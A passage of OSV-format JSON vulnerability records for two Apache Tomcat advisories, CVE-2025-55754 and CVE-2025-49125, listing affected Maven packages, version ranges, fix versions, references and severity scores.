"ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.11" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.10", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-vfww-5hm6-hx2j/GHSA-vfww-5hm6-hx2j.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.45" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", "10.1.4", "10.1.40", "10.1.41", "10.1.42", "10.1.43", "10.1.44", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-vfww-5hm6-hx2j/GHSA-vfww-5hm6-hx2j.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.40" }, { "fixed": "9.0.109" } ] } ], "versions": [ "9.0.100", "9.0.102", "9.0.104", "9.0.105", "9.0.106", "9.0.107", "9.0.108", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-vfww-5hm6-hx2j/GHSA-vfww-5hm6-hx2j.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.60" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.100", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-vfww-5hm6-hx2j/GHSA-vfww-5hm6-hx2j.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.11" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.10", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-vfww-5hm6-hx2j/GHSA-vfww-5hm6-hx2j.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.45" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", "10.1.4", "10.1.40", "10.1.41", "10.1.42", "10.1.43", "10.1.44", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-vfww-5hm6-hx2j/GHSA-vfww-5hm6-hx2j.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.40" }, { "fixed": "9.0.109" } ] } ], "versions": [ "9.0.100", "9.0.102", "9.0.104", "9.0.105", "9.0.106", "9.0.107", "9.0.108", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-vfww-5hm6-hx2j/GHSA-vfww-5hm6-hx2j.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.60" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.100", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-vfww-5hm6-hx2j/GHSA-vfww-5hm6-hx2j.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.11" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.10", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-vfww-5hm6-hx2j/GHSA-vfww-5hm6-hx2j.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.45" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", "10.1.4", "10.1.40", "10.1.41", "10.1.42", "10.1.43", "10.1.44", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-vfww-5hm6-hx2j/GHSA-vfww-5hm6-hx2j.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.40" }, { "fixed": "9.0.109" } ] } ], "versions": [ "9.0.100", "9.0.102", "9.0.104", "9.0.105", "9.0.106", "9.0.107", "9.0.108", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-vfww-5hm6-hx2j/GHSA-vfww-5hm6-hx2j.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.60" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.100", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-vfww-5hm6-hx2j/GHSA-vfww-5hm6-hx2j.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55754" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/138d7f5cfaae683078948303333c080e6faa75d2" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/5a3db092982c0c58d4855304167ee757fe5e79bb" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/a03cabf3a36a42d27d8d997ed31f034f50ba6cd5" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/j7w54hqbkfcn0xb9xy0wnx8w5nymcbqd" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-10.html#Fixed_in_Apache_Tomcat_10.1.45" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-11.html#Fixed_in_Apache_Tomcat_11.0.11" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.109" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/10/27/5" } ], "database_specific": { "cwe_ids": [ "CWE-150" ], "github_reviewed": true, "github_reviewed_at": "2025-10-28T17:57:42Z", "nvd_published_at": "2025-10-27T18:15:42Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-wc4r-xq3c-5cf3", "published": "2025-06-16T15:32:28Z", "modified": "2025-11-03T23:15:58.045513Z", "aliases": [ "BIT-tomcat-2025-49125", "CVE-2025-49125" ], "related": [ "CGA-mqcq-4vj8-j6r4" ], "summary": "Apache Tomcat - Security constraint bypass for pre/post-resources", "details": "Authentication Bypass Using an Alternate Path or Channel vulnerability in Apache Tomcat.  When using PreResources or PostResources mounted other than at the root of the web application, it was possible to access those resources via an unexpected path. That path was likely not to be protected by the same security constraints as the expected path, allowing those security constraints to be bypassed.\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.7, from 10.1.0-M1 through 10.1.41, from 9.0.0.M1 through 9.0.105. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 through 8.5.100. Other, older, EOL versions may also be affected.\n\nUsers are recommended to upgrade to version 11.0.8, 10.1.42 or 9.0.106, which fix the issue.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.8" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7" ], "database_specific": { "last_known_affected_version_range": "\u003c= 11.0.7", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-wc4r-xq3c-5cf3/GHSA-wc4r-xq3c-5cf3.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.42" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", "10.1.4", "10.1.40", "10.1.41", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 10.1.41", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-wc4r-xq3c-5cf3/GHSA-wc4r-xq3c-5cf3.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.106" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.100", "9.0.102", "9.0.104", "9.0.105", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.105", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-wc4r-xq3c-5cf3/GHSA-wc4r-xq3c-5cf3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.8" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7" ], "database_specific": { "last_known_affected_version_range": "\u003c= 11.0.7", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-wc4r-xq3c-5cf3/GHSA-wc4r-xq3c-5cf3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.42" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", "10.1.4", "10.1.40", "10.1.41", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 10.1.41", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-wc4r-xq3c-5cf3/GHSA-wc4r-xq3c-5cf3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.106" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.100", "9.0.102", "9.0.104", "9.0.105", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.105", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-wc4r-xq3c-5cf3/GHSA-wc4r-xq3c-5cf3.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.0", "8.5.100", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-wc4r-xq3c-5cf3/GHSA-wc4r-xq3c-5cf3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.0", "8.5.100", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-wc4r-xq3c-5cf3/GHSA-wc4r-xq3c-5cf3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-49125" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/7617b9c247bc77ed0444dd69adcd8aa48777886c" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/9418e3ff9f1f4c006b4661311ae9376c52d162b9" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/d94bd36fb7eb32e790dae0339bc249069649a637" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/m66cytbfrty9k7dc4cg6tl1czhsnbywk" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/07/msg00009.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-10.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-11.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/06/16/2" } ], "database_specific": { "cwe_ids": [ "CWE-288" ], "github_reviewed": true, "github_reviewed_at": "2025-06-16T18:02:12Z", "nvd_published_at": "2025-06-16T15:15:24Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V4", "score": 